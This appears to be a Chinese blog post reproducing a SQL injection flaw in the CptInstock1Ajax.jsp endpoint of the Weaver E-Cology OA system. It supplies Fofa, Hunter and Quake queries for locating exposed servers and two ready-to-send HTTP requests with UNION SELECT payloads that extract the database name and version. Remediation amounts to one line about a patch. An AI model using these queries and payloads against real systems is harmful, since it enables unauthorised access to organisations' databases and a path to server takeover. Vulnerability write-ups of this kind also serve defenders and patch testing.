泛微E-Cology系统 CptInstock1Ajax SQL注入漏洞复现

0x01 产品描述:

‌ **泛微E-Cology是一款专为中大型组织设计的数字化办公系统,旨在创建高效协同的办公环境。**‌ 该系统集成了智能化、平台化和全程数字化的特点,通过智能语音交互、与其他异构系统的集成以及电子印章、电子签名等技术的应用,实现了组织的全面数字化转型‌

0x02 漏洞描述:

泛微 E-Cology OA协同商务系统前台CptInstock1Ajax接口存在SQL注入漏洞,攻击者可以通过漏洞获取服务器内敏感信息导致信息泄露,甚至通过漏洞写入木马病毒获取服务器权限。

0x03 搜索语句:

Fofa:app="泛微-OA(e-cology)"

Hunter:body="/wui/common/page/sysRemind.jsp"

Quake:body="/wui/common/page/sysRemind.jsp"

0x04 漏洞复现:

数据库查询:

复制代码
GET /cpt/capital/CptInstock1Ajax.jsp?id=-99+UNION+ALL+SELECT+DB_Name(),1# HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

版本查询:

复制代码
GET /cpt/capital/CptInstock1Ajax.jsp?id=-99+UNION+ALL+SELECT+@@VERSION,1# HTTP/1.1
Host:your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

0x05 修复建议:

厂商已发布补丁 请及时修复。

相关推荐
诗句藏于尽头2 小时前
完成ssl不安全警告
网络协议·安全·ssl
独行soc7 小时前
#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)
linux·科技·安全·网络安全·面试·渗透测试
Me4神秘7 小时前
Linux国产与国外进度对垒
linux·服务器·安全
老K(郭云开)8 小时前
谷歌浏览器安全输入控件-allWebSafeInput控件
安全
Whoisshutiao9 小时前
网安-XSS-pikachu
前端·安全·网络安全
还是奇怪9 小时前
Linux - 安全排查 2
linux·运维·安全
Clownseven15 小时前
云端备份与恢复策略:企业如何选择最安全的备份解决方案
安全
薄荷椰果抹茶17 小时前
【网络安全基础】第六章---Web安全需求
安全·web安全
HumanRisk1 天前
降低网络安全中的人为风险:以人为本的路径
网络·安全·web安全
运维开发王义杰1 天前
金融安全生命线:用AWS EventBridge和CloudTrail构建主动式入侵检测系统
安全·金融·aws